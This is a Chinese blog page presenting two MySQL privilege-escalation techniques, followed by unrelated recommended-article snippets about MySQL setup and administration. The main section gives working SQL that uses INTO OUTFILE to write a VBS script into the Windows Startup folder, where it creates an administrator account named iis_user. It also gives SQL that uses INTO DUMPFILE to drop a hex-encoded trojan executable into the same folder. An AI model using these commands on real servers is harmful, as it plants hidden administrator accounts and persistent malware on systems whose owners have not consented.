`
zxj010802986
  • 浏览: 11815 次
文章分类
社区版块
存档分类
最新评论

MySQL服务器提权两例

 
阅读更多

 

 

 

 

create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";

create table a (cmd BLOB);
insert into a values (CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile ’C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动
\\mm.exe’
drop table a;
执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\

 

 

 

 

 

 

 

 


本文固定链接:http://www.verydemo.com/demo_c116_i10307.html

分享到:
评论

相关推荐

    linux下mysql安装、目录结构、配置

    这里以 RHEL4 的 32 位系统为例,下载了 MySQL-server-community-5.1.44-1.rhel4.i386.rpm 和 MySQL-client-community-5.1.44-1.rhel4.i386.rpm 两个安装包。 2. 安装 MySQL 使用 rpm 命令安装 MySQL 服务器和...

    “MySQL数据库”课程教学难点分析——以数据库设计为例.pdf

    本文主要讨论了 MySQL 数据库教学中的难点和解决方案,以数据库设计为例,探讨了 MySQL 数据库教学中存在的问题和挑战,旨在提高教学效率和学生学习兴趣。 一、 MySQL 服务器环境配置 MySQL 配置工具内容十分复杂...

    mysql常用命令

    缺省有两个数据库:mysql和test。 mysql库存放着mysql的系统和用户权限信息,我们改密码和新增用户,实际上就是对这个库进行操作。 2、 显示库中的数据表: use mysql; show tables; 3、 显示数据表的结构: ...

    使用keepalived实现对mysql主从复制的主备自动切换.docx

    在实验环境中,我们使用了两台主机,分别安装了keepalived和mysql服务器。其中,VIP(虚拟IP)为192.168.1.197,master节点的IP地址为192.168.1.198,slave节点的IP地址为192.168.1.199。 安装步骤 1. 安装...

    MySQL数据库:用户的管理.pptx

    用户要访问MySQL数据库,首先必须拥有登录到MySQL服务器的用户名和口令。登录到服务器后,MySQL允许用户在其权限内使用数据库资源。MySQL的安全系统很灵活,它允许以多种不同的方式创建用户和设置用户权限。 ;可以...

    MySQL命令大全

    FILE: 在MySQL服务器上读写文件。 PROCESS: 显示或杀死属于其它用户的服务线程。 RELOAD: 重载访问控制表,刷新日志等。 SHUTDOWN: 关闭MySQL服务。 数据库/数据表/数据列权限: Alter: 修改已存在的数据表...

    Sphinx搜索引擎架构与使用文档(和MySQL结合)V1.1.

    ⑵、登录运行在3306端口的MySQL服务器(提供“搜索查询服务”): 14 ⑶、创建数据库“Sphinx”和相对应的Sphinx表(SQL语句): 15 示例SQL: 15 四、如何通过SQL语句调用搜索引擎: 15 1、搜索应用实例 15 ⑴、...

    MYSQL常用命令大全

    FILE: 在MySQL服务器上读写文件。 PROCESS: 显示或杀死属于其它用户的服务线程。 RELOAD: 重载访问控制表,刷新日志等。 SHUTDOWN: 关闭MySQL服务。 数据库/数据表/数据列权限: Alter: 修改已存在的数据表(例如增加...

    TR069-OPENACS服务器搭建.doc

    TR069 Openacs服务器搭建 目录 一、安装JDK 3 二、安装MySQL数据库及驱动 5 三、JBOSS服务器 13 四、在ANT下编译ACS源码 16 五、在JBOSS中部署编译后的openacs项目 19 六、OPENACS操作简要手册 22 1 、CPE的设置 22 ...

    [php]mysql数据库操作——DB类

    -- 作 用:取得 MySQL 服务器信息 -- 参 数:$num 信息值(选填) -- 返回值:字符串 -- 实 例:无 *******************************************************************/ public function get_info($num){ ...

    Mysql MHA高可用集群架构1

    在本例中,我们使用 CentOS 6.8 作为操作系统,MySQL 5.7 作为数据库管理系统。我们将 Db250 作为集群管理节点,Db251 作为主库,Db253 作为备用主库,Db254 作为从库。我们需要配置 SSH 免密登陆与 hosts 文件配置...

    Linux牛刀小试系列讲座(之四):Linux数据库服务器.pdf

    本文将以MySQL为例,介绍Linux数据库服务器的安装、配置和使用。 MySQL的安装 MySQL的安装可以通过rpm包安装和源代码包安装两种方式实现。 rpm包安装 rpm包安装需要以下几个RPM包文件: 1. mysql-server-4.1.7-...

    JAVA_MySQL性能优化的21个最佳实践.pdf

    MySQL服务器通常开启查询缓存,这是提高性能最有效的方法之一。查询缓存可以将相同的查询结果缓存起来,以便后续相同的查询可以直接访问缓存结果。然而,某些查询语句可能会让MySQL不使用缓存,例如使用了CURDATE()...

    记录一次MYSQL数据库卡顿解决方式.pdf

    在本文中,我们将讨论MYSQL 数据库卡顿解决方式,主要包括查看服务器运行情况、对症问题分析、查死锁、查运行慢的 SQL、优化 SQL 执行计划等几个方面。 查看服务器运行情况 在 MYSQL 数据库卡顿时,首先需要查看...

    MySQL主从复制常见故障排除

    一、简介 主从复制的原理本站的...本文介绍了两例故障和解决方案,供各位朋友参考学习。 注:首先需保证主端服务器与从端服务器可以ping通,主从配置文件正确无误。 二、故障一 Got fatal error 1236 from master whe

    MySql資料庫編碼處理

    MySQL 4.1的字符集支持(Character Set Support)有两个方面:字符集(Character set)和排序方式(Collation)。对于字符集的支持细化到四个层次: 服务器(server),数据库(database),数据表(table)和连接(connection)。...

    基于Jsp+JavaBean+Servlet+MySQL的学生宿舍信息管理系统源码+项目说明(课程作业).zip

    基于Jsp+JavaBean+Servlet+MySQL的学生宿舍信息管理系统源码+项目说明(课程作业).zip 1.开发前期进行需求分析、概要设计及详细设计,使用Rational Rose进行UML建模(含用例图、类图、业务流程图、状态图、活动图、包...

    mysql海量数据的存储和访问解决方案宣贯.pdf

    以实现方式和实现的层次来划分,大概分为两个层次(Java 应用为例): JDBC 层的封装, ORM 框架层的实现。就JDBC 层的直接封装而言,现在国内发展较好的一个项目是被称作“变形虫 ” (Amoeba)的项目,由阿里集团的...

    PHP开发实战1200例(第1卷).(清华出版.潘凯华.刘中华).part2

    实例013 安装MySQL数据库服务器 26 实例014 安装PHP.50 28 实例015 第4个PHP程序 30 1.5 XAMPP——Linux版PHP集成化安装包 31 实例016 XAMPP——Linux下PHP开发环境的集成化 31 实例017 Linux操作系统下启动XAMPP 32...

    通信与网络中的如何修改Linux下MySQL5.0的默认连接数

    这段时间服务器崩溃2次,一直没有找到原因,今天看到论坛发出的错误信息邮件,想起可能是mysql的默认连接数引起的问题,一查果然,老天,默认 连接数才100, 怎么够呀,在网上找了半天资料,有说修改my.cnf的,有说...

Global site tag (gtag.js) - Google Analytics